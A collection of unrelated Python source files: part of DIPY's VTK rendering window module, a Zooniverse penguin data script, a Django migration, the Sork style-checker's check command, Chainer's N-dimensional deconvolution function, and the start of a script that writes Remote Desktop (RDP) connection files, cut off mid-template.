* for quiting press 'q'
Examples
--------
>>> from dipy.viz import actor, window
>>> renderer = window.Renderer()
>>> renderer.add(actor.axes())
>>> showm = window.ShowManager(renderer)
>>> # showm.initialize()
>>> # showm.render()
>>> # showm.start()
"""
if ren is None:
ren = Renderer()
self.ren = ren
self.title = title
self.size = size
self.png_magnify = png_magnify
self.reset_camera = reset_camera
self.order_transparent = order_transparent
self.interactor_style = interactor_style
if self.reset_camera:
self.ren.ResetCamera()
self.window = vtk.vtkRenderWindow()
self.window.AddRenderer(ren)
if self.title == 'DIPY':
self.window.SetWindowName(title + ' ' + dipy_version)
else:
self.window.SetWindowName(title)
self.window.SetSize(size[0], size[1])
if self.order_transparent:
# Use a render window with alpha bits
# as default is 0 (false))
self.window.SetAlphaBitPlanes(True)
# Force to not pick a framebuffer with a multisample buffer
# (default is 8)
self.window.SetMultiSamples(0)
# Choose to use depth peeling (if supported)
# (default is 0 (false)):
self.ren.UseDepthPeelingOn()
# Set depth peeling parameters
# Set the maximum number of rendering passes (default is 4)
ren.SetMaximumNumberOfPeels(4)
# Set the occlusion ratio (initial value is 0.0, exact image):
ren.SetOcclusionRatio(0.0)
if self.interactor_style == 'image':
self.style = vtk.vtkInteractorStyleImage()
elif self.interactor_style == 'trackball':
self.style = vtk.vtkInteractorStyleTrackballCamera()
elif self.interactor_style == 'custom':
self.style = CustomInteractorStyle()
else:
self.style = interactor_style
self.iren = vtk.vtkRenderWindowInteractor()
self.style.SetCurrentRenderer(self.ren)
# Hack: below, we explicitly call the Python version of SetInteractor.
self.style.SetInteractor(self.iren)
self.iren.SetInteractorStyle(self.style)
self.iren.SetRenderWindow(self.window)
def initialize(self):
""" Initialize interaction
"""
self.iren.Initialize()
def render(self):
""" Renders only once
"""
self.window.Render()
def start(self):
""" Starts interaction
"""
try:
self.iren.Start()
except AttributeError:
self.__init__(self.ren, self.title, size=self.size,
png_magnify=self.png_magnify,
reset_camera=self.reset_camera,
order_transparent=self.order_transparent,
interactor_style=self.interactor_style)
self.initialize()
self.render()
self.iren.Start()
self.window.RemoveRenderer(self.ren)
self.ren.SetRenderWindow(None)
del self.iren
del self.window
def record_events(self):
""" Records events during the interaction.
The recording is represented as a list of VTK events that happened
during the interaction. The recorded events are then returned.
Returns
-------
events : str
Recorded events (one per line).
Notes
-----
Since VTK only allows recording events to a file, we use a
temporary file from which we then read the events.
"""
with InTemporaryDirectory():
filename = "recorded_events.log"
recorder = vtk.vtkInteractorEventRecorder()
recorder.SetInteractor(self.iren)
recorder.SetFileName(filename)
def _stop_recording_and_close(obj, evt):
recorder.Stop()
self.iren.TerminateApp()
self.iren.AddObserver("ExitEvent", _stop_recording_and_close)
recorder.EnabledOn()
recorder.Record()
self.initialize()
self.render()
self.iren.Start()
# Retrieved recorded events.
events = open(filename).read()
return events
def record_events_to_file(self, filename="record.log"):
""" Records events during the interaction.
The recording is represented as a list of VTK events
that happened during the interaction. The recording is
going to be saved into `filename`.
Parameters
----------
filename : str
Name of the file that will contain the recording (.log|.log.gz).
"""
events = self.record_events()
# Compress file if needed
if filename.endswith(".gz"):
gzip.open(filename, 'wb').write(asbytes(events))
else:
open(filename, 'w').write(events)
def play_events(self, events):
""" Plays recorded events of a past interaction.
The VTK events that happened during the recorded interaction will be
played back.
Parameters
----------
events : str
Recorded events (one per line).
"""
recorder = vtk.vtkInteractorEventRecorder()
recorder.SetInteractor(self.iren)
recorder.SetInputString(events)
recorder.ReadFromInputStringOn()
self.initialize()
self.render()
recorder.Play()
def play_events_from_file(self, filename):
""" Plays recorded events of a past interaction.
The VTK events that happened during the recorded interaction will be
played back from `filename`.
Parameters
----------
filename : str
Name of the file containing the recorded events (.log|.log.gz).
"""
# Uncompress file if needed.
if filename.endswith(".gz"):
with gzip.open(filename, 'r') as f:
events = f.read()
else:
with open(filename) as f:
events = f.read()
self.play_events(events)
def add_window_callback(self, win_callback):
""" Add window callbacks
"""
self.window.AddObserver(vtk.vtkCommand.ModifiedEvent, win_callback)
self.window.Render()
def show(ren, title='DIPY', size=(300, 300),
png_magnify=1, reset_camera=True, order_transparent=False):
""" Show window with current renderer
Parameters
------------
ren : Renderer() or vtkRenderer()
The scene that holds all the actors.
title : string
A string for the window title bar. Default is DIPY and current version.
size : (int, int)
``(width, height)`` of the window. Default is (300, 300).
png_magnify : int
Number of times to magnify the screenshot. Default is 1. This can be
used to save high resolution screenshots when pressing 's' inside the
window.
reset_camera : bool
Default is True. You can change this option to False if you want to
keep the camera as set before calling this function.
order_transparent : bool
True is useful when you want to order transparent
actors according to their relative position to the camera. The default
option which is False will order the actors according to the order of
their addition to the Renderer().
Notes
-----
Default interaction keys for
* 3d navigation are with left, middle and right mouse dragging
* resetting the camera press 'r'
* saving a screenshot press 's'
* for quiting press 'q'
Examples
----------
>>> import numpy as np
>>> from dipy.viz import fvtk
>>> r=fvtk.ren()
>>> lines=[np.random.rand(10,3),np.random.rand(20,3)]
>>> colors=np.array([[0.2,0.2,0.2],[0.8,0.8,0.8]])
>>> c=fvtk.line(lines,colors)
>>> fvtk.add(r,c)
>>> l=fvtk.label(r)
>>> fvtk.add(r,l)
>>> #fvtk.show(r)
See also
---------
dipy.viz.window.record
dipy.viz.window.snapshot
"""
show_manager = ShowManager(ren, title, size,
png_magnify, reset_camera, order_transparent)
show_manager.initialize()
show_manager.render()
show_manager.start()
def record(ren=None, cam_pos=None, cam_focal=None, cam_view=None,
out_path=None, path_numbering=False, n_frames=1, az_ang=10,
magnification=1, size=(300, 300), reset_camera=True, verbose=False):
""" This will record a video of your scene
Records a video as a series of ``.png`` files of your scene by rotating the
azimuth angle az_angle in every frame.
Parameters
-----------
ren : vtkRenderer() object
as returned from function ren()
cam_pos : None or sequence (3,), optional
Camera's position. If None then default camera's position is used.
cam_focal : None or sequence (3,), optional
Camera's focal point. If None then default camera's focal point is
used.
cam_view : None or sequence (3,), optional
Camera's view up direction. If None then default camera's view up
vector is used.
out_path : str, optional
Output path for the frames. If None a default dipy.png is created.
path_numbering : bool
When recording it changes out_path to out_path + str(frame number)
n_frames : int, optional
Number of frames to save, default 1
az_ang : float, optional
Azimuthal angle of camera rotation.
magnification : int, optional
How much to magnify the saved frame. Default is 1.
size : (int, int)
``(width, height)`` of the window. Default is (300, 300).
reset_camera : bool
If True Call ``ren.reset_camera()``. Otherwise you need to set the
camera before calling this function.
verbose : bool
print information about the camera. Default is False.
Examples
---------
>>> from dipy.viz import fvtk
>>> r=fvtk.ren()
>>> a=fvtk.axes()
>>> fvtk.add(r,a)
>>> #uncomment below to record
>>> #fvtk.record(r)
>>> #check for new images in current directory
"""
if ren is None:
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(size[0], size[1])
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# ren.GetActiveCamera().Azimuth(180)
if reset_camera:
ren.ResetCamera()
renderLarge = vtk.vtkRenderLargeImage()
if major_version <= 5:
renderLarge.SetInput(ren)
else:
renderLarge.SetInput(ren)
renderLarge.SetMagnification(magnification)
renderLarge.Update()
writer = vtk.vtkPNGWriter()
ang = 0
if cam_pos is not None:
cx, cy, cz = cam_pos
ren.GetActiveCamera().SetPosition(cx, cy, cz)
if cam_focal is not None:
fx, fy, fz = cam_focal
ren.GetActiveCamera().SetFocalPoint(fx, fy, fz)
if cam_view is not None:
ux, uy, uz = cam_view
ren.GetActiveCamera().SetViewUp(ux, uy, uz)
cam = ren.GetActiveCamera()
if verbose:
print('Camera Position (%.2f, %.2f, %.2f)' % cam.GetPosition())
print('Camera Focal Point (%.2f, %.2f, %.2f)' % cam.GetFocalPoint())
print('Camera View Up (%.2f, %.2f, %.2f)' % cam.GetViewUp())
for i in range(n_frames):
ren.GetActiveCamera().Azimuth(ang)
renderLarge = vtk.vtkRenderLargeImage()
renderLarge.SetInput(ren)
renderLarge.SetMagnification(magnification)
renderLarge.Update()
writer.SetInputConnection(renderLarge.GetOutputPort())
if path_numbering:
if out_path is None:
filename = str(i).zfill(6) + '.png'
else:
filename = out_path + str(i).zfill(6) + '.png'
else:
if out_path is None:
filename = 'dipy.png'
else:
filename = out_path
writer.SetFileName(filename)
writer.Write()
ang = +az_ang
def snapshot(ren, fname=None, size=(300, 300), offscreen=True,
order_transparent=False):
""" Saves a snapshot of the renderer in a file or in memory
Parameters
-----------
ren : vtkRenderer
as returned from function renderer()
fname : str or None
Save PNG file. If None return only an array without saving PNG.
size : (int, int)
``(width, height)`` of the window. Default is (300, 300).
offscreen : bool
Default True. Go stealthmode no window should appear.
order_transparent : bool
Default False. Use depth peeling to sort transparent objects.
Returns
-------
arr : ndarray
Color array of size (width, height, 3) where the last dimension
holds the RGB values.
"""
width, height = size
if offscreen:
graphics_factory = vtk.vtkGraphicsFactory()
graphics_factory.SetOffScreenOnlyMode(1)
# TODO check if the line below helps in something
# graphics_factory.SetUseMesaClasses(1)
render_window = vtk.vtkRenderWindow()
if offscreen:
render_window.SetOffScreenRendering(1)
render_window.AddRenderer(ren)
render_window.SetSize(width, height)
if order_transparent:
# Use a render window with alpha bits
# as default is 0 (false))
render_window.SetAlphaBitPlanes(True)
# Force to not pick a framebuffer with a multisample buffer
# (default is 8)
render_window.SetMultiSamples(0)
# Choose to use depth peeling (if supported)
# (default is 0 (false)):
ren.UseDepthPeelingOn()
# Set depth peeling parameters
# Set the maximum number of rendering passes (default is 4)
ren.SetMaximumNumberOfPeels(4)
# Set the occlusion ratio (initial value is 0.0, exact image):
ren.SetOcclusionRatio(0.0)
render_window.Render()
window_to_image_filter = vtk.vtkWindowToImageFilter()
window_to_image_filter.SetInput(render_window)
window_to_image_filter.Update()
vtk_image = window_to_image_filter.GetOutput()
h, w, _ = vtk_image.GetDimensions()
vtk_array = vtk_image.GetPointData().GetScalars()
components = vtk_array.GetNumberOfComponents()
arr = vtk_to_numpy(vtk_array).reshape(h, w, components)
if fname is None:
return arr
writer = vtk.vtkPNGWriter()
writer.SetFileName(fname)
writer.SetInputConnection(window_to_image_filter.GetOutputPort())
writer.Write()
return arr
def analyze_renderer(ren):
class ReportRenderer(object):
bg_color = None
report = ReportRenderer()
report.bg_color = ren.GetBackground()
report.collection = ren.GetActors()
report.actors = report.collection.GetNumberOfItems()
report.collection.InitTraversal()
report.actors_classnames = []
for i in range(report.actors):
class_name = report.collection.GetNextActor().GetClassName()
report.actors_classnames.append(class_name)
return report
def analyze_snapshot(im, bg_color=(0, 0, 0), colors=None,
find_objects=True,
strel=None):
""" Analyze snapshot from memory or file
Parameters
----------
im: str or array
If string then the image is read from a file otherwise the image is
read from a numpy array. The array is expected to be of shape (X, Y, 3)
where the last dimensions are the RGB values.
colors: tuple (3,) or list of tuples (3,)
List of colors to search in the image
find_objects: bool
If True it will calculate the number of objects that are different
from the background and return their position in a new image.
strel: 2d array
Structure element to use for finding the objects.
Returns
-------
report : ReportSnapshot
This is an object with attibutes like ``colors_found`` that give
information about what was found in the current snapshot array ``im``.
"""
if isinstance(im, string_types):
im = imread(im)
class ReportSnapshot(object):
objects = None
labels = None
colors_found = False
report = ReportSnapshot()
if colors is not None:
if isinstance(colors, tuple):
colors = [colors]
flags = [False] * len(colors)
for (i, col) in enumerate(colors):
# find if the current color exist in the array
flags[i] = np.any(np.all(im == col, axis=-1))
report.colors_found = flags
if find_objects is True:
weights = [0.299, 0.587, 0.144]
gray = np.dot(im[..., :3], weights)
bg_color = im[0, 0]
background = np.dot(bg_color, weights)
if strel is None:
strel = np.array([[0, 1, 0],
[1, 1, 1],
[0, 1, 0]])
labels, objects = ndimage.label(gray != background, strel)
report.labels = labels
report.objects = objects
return report
|
#!/usr/bin/env python
__author__ = 'greghines'
import numpy as np
import os
import pymongo
import sys
import urllib
import matplotlib.cbook as cbook
from PIL import Image
import matplotlib.pyplot as plt
import warnings
if os.path.exists("/home/ggdhines"):
sys.path.append("/home/ggdhines/PycharmProjects/reduction/experimental/clusteringAlg")
else:
sys.path.append("/home/greg/github/reduction/experimental/clusteringAlg")
from divisiveDBSCAN import DivisiveDBSCAN
if os.path.exists("/home/ggdhines"):
base_directory = "/home/ggdhines"
else:
base_directory = "/home/greg"
client = pymongo.MongoClient()
db = client['penguin_2014-10-12']
collection = db["penguin_classifications"]
collection2 = db["penguin_subjects"]
steps = [5,10,15,20]
penguins_at = {k:[] for k in steps}
alreadyThere = False
subject_index = 0
l = []
for subject in collection2.find({"classification_count": 20}):
subject_index += 1
#if subject_index == 2:
# break
l.append(subject["zooniverse_id"])
import cPickle as pickle
pickle.dump(l,open(base_directory+"/Databases/sample.pickle","wb"))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-08-19 10:48
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0036_auto_20170813_1108'),
]
operations = [
migrations.CreateModel(
name='PartAttachement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.AddField(
model_name='file',
name='description',
field=models.TextField(blank=True, default=''),
),
migrations.AddField(
model_name='partattachement',
name='file',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.File'),
),
migrations.AddField(
model_name='partattachement',
name='part',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='attachements', to='api.Part'),
),
]
|
# This file is part of Sork.
#
# Copyright (C) 2016-2019 Martin Ejdestig <[email protected]>
#
# Sork is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sork is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sork. If not, see <http://www.gnu.org/licenses/>.
#
# SPDX-License-Identifier: GPL-3.0-or-later
import argparse
from .. import checks
from .. import concurrent
from .. import source
from ..project import Project
from ..progress_printer import ProgressPrinter
def add_argparse_subparser(subparsers: argparse.Action, source_paths_arg_name: str) -> None:
# TODO: Better fix? Have to silence mypy since Action does not have add_parser() and
# argparse._SubParserAction is not public.
parser = subparsers.add_parser('check', help='style check source code') # type: ignore
parser.set_defaults(run_command=run)
parser.add_argument('-c',
'--checks',
type=str,
help='Comma separated list of checks to perform. Overrides '
'configuration in .sork. Prepend - to disable a check. Regular '
'expressions may be used. All checks except foo: --checks=-foo . '
'Checks starting with clang-: --checks=clang-.* .',
metavar='<checks>')
parser.add_argument(source_paths_arg_name,
nargs='*',
help='Check path(s). Directories are recursed. All source code in '
'project, subject to configuration in .sork, is checked if no '
'%(metavar)s is passed or if only %(metavar)s passed is the '
'project\'s root.',
metavar='<path>')
def run(args: argparse.Namespace, project: Project) -> None:
check_strings = args.checks.split(',') if args.checks else project.config['checks']
enabled_checks = checks.create.from_strings(project, check_strings)
source_files = source.find_files(project, args.source_paths)
printer = ProgressPrinter(verbose=args.verbose)
printer.start('Checking source', len(source_files))
def check_source_file(source_file: source.SourceFile) -> None:
printer.start_with_item(source_file.path)
outputs = (c.run(source_file) for c in enabled_checks)
printer.done_with_item('\n'.join(o for o in outputs if o))
try:
concurrent.for_each(check_source_file, source_files, num_threads=args.jobs)
except BaseException:
printer.abort()
raise
|
import numpy
from six import moves
import chainer
from chainer import backend
from chainer.backends import cuda
from chainer import configuration
from chainer import function_node
from chainer.functions.connection import convolution_2d
from chainer.functions.connection import convolution_nd
from chainer import utils
from chainer.utils import conv
from chainer.utils import conv_nd
from chainer.utils import type_check
import chainerx
class DeconvolutionND(function_node.FunctionNode):
cover_all = None
def __init__(self, ndim, stride=1, pad=0, outsize=None,
dilate=1, groups=1):
self.ndim = ndim
self.stride = conv_nd.as_tuple(stride, ndim)
self.pad = conv_nd.as_tuple(pad, ndim)
if outsize is not None:
assert len(outsize) == ndim
self.outs = outsize
self.dilate = conv_nd.as_tuple(dilate, ndim)
self.groups = groups
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(2 <= n_in, n_in <= 3)
x_type, w_type = in_types[:2]
type_check.expect(
x_type.dtype.kind == 'f',
w_type.dtype.kind == 'f',
x_type.ndim == self.ndim + 2,
w_type.ndim == self.ndim + 2,
x_type.shape[1] == w_type.shape[0]
)
if self.outs is not None:
for i, (out, s, p, di) in enumerate(zip(
self.outs, self.stride, self.pad, self.dilate)):
lower_bound = conv.get_conv_outsize(
out, w_type.shape[i + 2], s, p, d=di)
upper_bound = conv.get_conv_outsize(
out, w_type.shape[i + 2], s, p, cover_all=True, d=di)
type_check.expect(
lower_bound <= x_type.shape[i + 2],
x_type.shape[i + 2] <= upper_bound)
if type_check.eval(n_in) == 3:
b_type = in_types[2]
type_check.expect(
b_type.dtype.kind == 'f',
b_type.ndim == 1,
# Need to consider the case that group count > 1.
# b_type.shape[0] == w_type.shape[1]
)
def _use_cudnn(self, x, W, b):
if ((cuda._cudnn_version < 6000
or configuration.config.cudnn_deterministic)
and any(d != 1 for d in self.dilate)):
# cuDNN < 6.0 and deterministic algorithms
# does not support dilated convolutions
return False
if cuda._cudnn_version < 7000 and 1 < self.groups:
# cuDNN < 7.0 does not support grouped convolutions
return False
return (
chainer.should_use_cudnn('>=auto')
and not self.cover_all
and self.ndim > 1
and x.dtype == W.dtype
and (b is None or x.dtype == b.dtype))
def _forward_xp(self, x, W, b, xp):
if 1 < self.groups:
return self._forward_grouped_convolution_xp(x, W, b, xp)
else:
return self._forward_xp_core(x, W, b, xp)
def _forward_grouped_convolution_xp(self, x, W, b, xp):
# G: group count
# N: batch size
# xC: input channels
# yC: output channels
G = self.groups
N, xC = x.shape[:2]
x_size = x.shape[2:]
yCg = W.shape[1]
yC = yCg * G
xCg = xC // G
k_size = W.shape[2:]
dims = len(k_size)
if xC % G != 0:
raise TypeError('The number of groups must be '
'a divisor of that of input channels')
x = xp.rollaxis(x, 1) # (xC, N, x_size...)
x = x.reshape(G, xCg, N * utils.size_of_shape(x_size))
W = W.reshape(G, xCg, yCg * utils.size_of_shape(k_size))
W = W.transpose(0, 2, 1) # (G, yCg*k_size, xCg)
# (G, yCg*k_size, N*x_size) = (G, yCg*k_size, xCg) @ (G, xCg, N*x_size)
col = convolution_2d._matmul(W, x).astype(x.dtype, copy=False)
col = col.reshape((yC,) + k_size + (N,) + x_size)
col = xp.rollaxis(col, dims + 1) # (N, yC, k_size..., x_size...)
y = conv_nd.col2im_nd(col, self.stride, self.pad, self.outs,
dilate=self.dilate)
if b is not None:
y += b.reshape(1, yC, *((1,) * dims))
return y,
def _forward_xp_core(self, x, W, b, xp):
ndim = self.ndim
stride = self.stride
pad = self.pad
dilate = self.dilate
# gcol: C_O, k_1, ..., k_N, n, d_1, ..., d_N
gcol = xp.tensordot(W, x, (0, 1)).astype(x.dtype, copy=False)
# Roll n, which is batch size, before the first.
gcol = xp.rollaxis(gcol, ndim + 1)
# y: n, C_O, d_1, d_2, ..., d_N
if xp is numpy:
y = conv_nd.col2im_nd_cpu(
gcol, stride, pad, self.outs, dilate=dilate)
else:
y = conv_nd.col2im_nd_gpu(
gcol, stride, pad, self.outs, dilate=dilate)
if b is not None:
b_shape = (1, -1) + (1,) * ndim
y += b.reshape(b_shape)
return y,
def _forward_cudnn(self, x, W, b):
c = W.shape[1] * self.groups
n, in_c = x.shape[:2] # x: n, C_I, d_1, d_2, ..., d_N
# Make empty array for output.
y_shape = (n, c) + self.outs # (n, c_O, out_1, out_2, ..., out_N)
y = cuda.cupy.empty(y_shape, dtype=x.dtype)
pad = self.pad
stride = self.stride
dilate = self.dilate
groups = self.groups
deterministic = configuration.config.cudnn_deterministic
auto_tune = configuration.config.autotune
tensor_core = configuration.config.use_cudnn_tensor_core
cuda.cudnn.convolution_backward_data(
W, x, b, y, pad, stride, dilate, groups,
deterministic=deterministic, auto_tune=auto_tune,
tensor_core=tensor_core)
return y,
def forward_chainerx(self, inputs):
# TODO(imanishi): Support it
if any(d != 1 for d in self.dilate):
return chainer.Fallback
# TODO(imanishi): Support it
if self.groups != 1:
return chainer.Fallback
# TODO(imanishi): Support it
if any(a.dtype != inputs[0].dtype for a in inputs):
return chainer.Fallback
# TODO(imanishi): Supporft it
if inputs[0].device.backend.name == 'cuda' and self.ndim < 2:
return chainer.Fallback
stride = self.stride
pad = self.pad
return chainerx.conv_transpose(*inputs, stride=stride, pad=pad),
def forward(self, inputs):
self.retain_inputs((0, 1)) # only retain x and W
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
if self.outs is None:
dims = x.shape[2:]
ksize = W.shape[2:]
self.outs = tuple(
conv.get_deconv_outsize(d, k, s, p, d=di)
for d, k, s, p, di
in zip(dims, ksize, self.stride, self.pad, self.dilate))
assert all(out > 0 for out in self.outs), \
'Output sizes should be positive.'
self._set_cover_all(x, W)
xp = backend.get_array_module(*inputs)
if xp is numpy:
return self._forward_xp(x, W, b, numpy)
elif not self._use_cudnn(x, W, b):
return self._forward_xp(x, W, b, cuda.cupy)
else:
return self._forward_cudnn(x, W, b)
def backward(self, indexes, grad_outputs):
x, W = self.get_retained_inputs()
gy, = grad_outputs
ret = []
if 0 in indexes:
gx = chainer.functions.convolution_nd(
gy, W, stride=self.stride, pad=self.pad,
cover_all=self.cover_all, dilate=self.dilate,
groups=self.groups)
ret.append(gx)
if 1 in indexes:
gW, = convolution_nd.ConvolutionNDGradW(self).apply((gy, x))
ret.append(gW)
if 2 in indexes:
axis = (0,) + tuple(moves.range(2, gy.ndim))
gb = chainer.functions.sum(gy, axis=axis)
if gb.dtype != self.inputs[2].dtype:
gb = chainer.functions.cast(gb, self.inputs[2].dtype)
ret.append(gb)
return ret
def _set_cover_all(self, x, W):
x_shape = x.shape[2:]
k_shape = W.shape[2:]
self.cover_all = any(
ix != conv.get_conv_outsize(oy, k, s, p, d=di)
for (ix, oy, k, s, p, di)
in zip(x_shape, self.outs, k_shape, self.stride, self.pad,
self.dilate))
def deconvolution_nd(x, W, b=None, stride=1, pad=0, outsize=None,
dilate=1, groups=1):
"""N-dimensional deconvolution function.
This is an implementation of N-dimensional deconvolution which generalizes
two-dimensional one. In most of deep learning frameworks and papers, this
function is called **transposed convolution**. But because of historical
reasons (e.g. paper by Ziller `Deconvolutional Networks`_) and backward
compatibility, this function is called **deconvolution** in Chainer.
.. _Deconvolutional Networks: \
http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf
It takes three variables: the input ``x``, the filter weight ``W``, and the
bias vector ``b``.
Notation: here is a notation for dimensionalities.
- :math:`N` is the number of spatial dimensions.
- :math:`n` is the batch size.
- :math:`c_I` and :math:`c_O` are the number of the input and output
channels, respectively.
- :math:`d_1, d_2, ..., d_N` are the size of each axis of the input's
spatial dimensions, respectively.
- :math:`k_1, k_2, ..., k_N` are the size of each axis of the filters,
respectively.
- :math:`p_1, p_2, ..., p_N` are the size of each axis of the spatial
padding size, respectively.
- :math:`s_1, s_2, ..., s_N` are the stride of each axis of filter
application, respectively.
If ``outsize`` option is ``None``, the output size
:math:`(l_1, l_2, ..., l_N)` is determined by the following equations with
the items in the above list:
.. math::
l_n = s_n (d_n - 1) + k_n - 2 p_n \\ \\ (n = 1, ..., N)
If ``outsize`` option is given, the output size is determined by
``outsize``. In this case, the ``outsize`` :math:`(l_1, l_2, ..., l_N)`
must satisfy the following equations:
.. math::
d_n = \\lfloor (l_n + 2p_n - k_n) / s_n \\rfloor + 1 \\ \\ \
(n = 1, ..., N)
Deconvolution links can use a feature of cuDNN called autotuning, which
selects the most efficient CNN algorithm for images of fixed-size,
can provide a significant performance boost for fixed neural nets.
To enable, set `chainer.using_config('autotune', True)`
Args:
x (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variable of shape :math:`(n, c_I, d_1, d_2, ..., d_N)`.
W (:class:`~chainer.Variable` or :ref:`ndarray`):
Weight variable of shape :math:`(c_I, c_O, k_1, k_2, ..., k_N)`.
b (None or :class:`~chainer.Variable` or :ref:`ndarray`):
One-dimensional bias variable with length :math:`c_O` (optional).
stride (:class:`int` or :class:`tuple` of :class:`int` s):
Stride of filter applications :math:`(s_1, s_2, ..., s_N)`.
``stride=s`` is equivalent to ``(s, s, ..., s)``.
pad (:class:`int` or :class:`tuple` of :class:`int` s):
Spatial padding width for input arrays
:math:`(p_1, p_2, ..., p_N)`. ``pad=p`` is equivalent to
``(p, p, ..., p)``.
outsize (None or :class:`tuple` of :class:`int` s):
Expected output size of deconvolutional operation. It should be a
tuple of ints :math:`(l_1, l_2, ..., l_N)`. Default value is
``None`` and the outsize is estimated by input size, stride and
pad.
dilate (:class:`int` or :class:`tuple` of :class:`int` s):
Dilation factor of filter applications.
``dilate=d`` and ``dilate=(d, d, ..., d)`` are equivalent.
groups (:class:`int`):
The number of groups to use grouped convolution.
The default is one, where grouped convolution is not used.
Returns:
~chainer.Variable:
Output variable of shape :math:`(n, c_O, l_1, l_2, ..., l_N)`.
.. seealso::
:class:`~chainer.links.DeconvolutionND` to manage the model parameters
``W`` and ``b``.
.. seealso:: :func:`deconvolution_2d`
.. admonition:: Example
**Example1**: the case when ``outsize`` is not given.
>>> n = 10
>>> c_i, c_o = 3, 1
>>> d1, d2, d3 = 5, 10, 15
>>> k1, k2, k3 = 10, 10, 10
>>> p1, p2, p3 = 5, 5, 5
>>> x = np.random.uniform(0, 1, (n, c_i, d1, d2, d3)).\
astype(np.float32)
>>> x.shape
(10, 3, 5, 10, 15)
>>> W = np.random.uniform(0, 1, (c_i, c_o, k1, k2, k3)).\
astype(np.float32)
>>> W.shape
(3, 1, 10, 10, 10)
>>> b = np.random.uniform(0, 1, (c_o)).astype(np.float32)
>>> b.shape
(1,)
>>> s1, s2, s3 = 2, 4, 6
>>> y = F.deconvolution_nd(x, W, b, stride=(s1, s2, s3), \
pad=(p1, p2, p3))
>>> y.shape
(10, 1, 8, 36, 84)
>>> l1 = s1 * (d1 - 1) + k1 - 2 * p1
>>> l2 = s2 * (d2 - 1) + k2 - 2 * p2
>>> l3 = s3 * (d3 - 1) + k3 - 2 * p3
>>> y.shape == (n, c_o, l1, l2, l3)
True
**Example2**: the case when ``outsize`` is given.
>>> n = 10
>>> c_i, c_o = 3, 1
>>> d1, d2, d3 = 5, 10, 15
>>> k1, k2, k3 = 10, 10, 10
>>> p1, p2, p3 = 5, 5, 5
>>> x = np.random.uniform(0, 1, (n, c_i, d1, d2, d3)).\
astype(np.float32)
>>> x.shape
(10, 3, 5, 10, 15)
>>> W = np.random.uniform(0, 1, (c_i, c_o, k1, k2, k3)).\
astype(np.float32)
>>> W.shape
(3, 1, 10, 10, 10)
>>> b = np.random.uniform(0, 1, (c_o)).astype(np.float32)
>>> b.shape
(1,)
>>> s1, s2, s3 = 2, 4, 6
>>> l1, l2, l3 = 9, 38, 87
>>> d1 == int((l1 + 2 * p1 - k1) / s1) + 1
True
>>> d2 == int((l2 + 2 * p2 - k2) / s2) + 1
True
>>> d3 == int((l3 + 2 * p3 - k3) / s3) + 1
True
>>> y = F.deconvolution_nd(x, W, b, stride=(s1, s2, s3), \
pad=(p1, p2, p3), outsize=(l1, l2, l3))
>>> y.shape
(10, 1, 9, 38, 87)
>>> y.shape == (n, c_o, l1, l2, l3)
True
"""
ndim = len(x.shape[2:])
func = DeconvolutionND(
ndim, stride, pad, outsize, dilate=dilate, groups=groups)
args = (x, W) if b is None else (x, W, b)
y, = func.apply(args)
return y
def deconvolution_1d(x, W, b=None, stride=1, pad=0, outsize=None,
dilate=1, groups=1):
"""1-dimensional deconvolution function.
.. note::
This function calls :func:`~chainer.functions.deconvolution_nd`
internally, so see the details of the behavior in
the documentation of :func:`~chainer.functions.deconvolution_nd`.
"""
if len(x.shape[2:]) != 1:
raise ValueError(
'The number of dimensions under channel dimension of the input '
'\'x\' should be 1. But the actual ndim was {}.'.format(
len(x.shape[2:])))
return deconvolution_nd(x, W, b, stride, pad, outsize, dilate, groups)
def deconvolution_3d(x, W, b=None, stride=1, pad=0, outsize=None,
dilate=1, groups=1):
"""3-dimensional deconvolution function.
.. note::
This function calls :func:`~chainer.functions.deconvolution_nd`
internally, so see the details of the behavior in
the documentation of :func:`~chainer.functions.deconvolution_nd`.
"""
if len(x.shape[2:]) != 3:
raise ValueError(
'The number of dimensions under channel dimension of the input '
'\'x\' should be 3. But the actual ndim was {}.'.format(
len(x.shape[2:])))
return deconvolution_nd(x, W, b, stride, pad, outsize, dilate, groups)
|
#! /usr/bin/env python
""" Quick Script to Generate RDP files """
import sys
import re
import os
import logging
import time
from logging.handlers import RotatingFileHandler
logger = logging.getLogger("RotatingLog")
logger.setLevel(logging.INFO)
handler = RotatingFileHandler('c:\\var\\logs\\syslog.log')
logger.addHandler(handler)
def log(msg):
fmt_msg = time.strftime("%y-%m-%d:%H-%M: ") + msg
print("%s" % fmt_msg)
logger.info(fmt_msg)
infile, outdir = sys.argv[1], sys.argv[2]
log("Starting Operations")
with open(infile) as inf:
log("opened file %s" % infile)
for line in inf:
pattern = re.compile("^#node")
if pattern.match(line):
line = line.split(':')
f = os.path.join(sys.argv[2],line[1]+".rdp")
log("opening rdp file for writing %s" % f)
t = open(f,'w+')
template = """
screen mode id:i:2
use multimon:i:0
desktopwidth:i:1920
desktopheight:i:1080
session bpp:i:32
winposstr:s:0,3,0,0,800,600
compression:i:1
keyboardhook:i:2
audiocapturemode:i:0
videoplaybackmode:i:1
connection type:i:7
networkautodetect:i:1
bandwidthautodetect:i:1
displayconnectionbar:i:1
username:s:{nuser}
enableworkspacereconnect:i:0
disable wallpaper:i:0
allow font smoothing:i:0
allow desktop composition:i:0
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
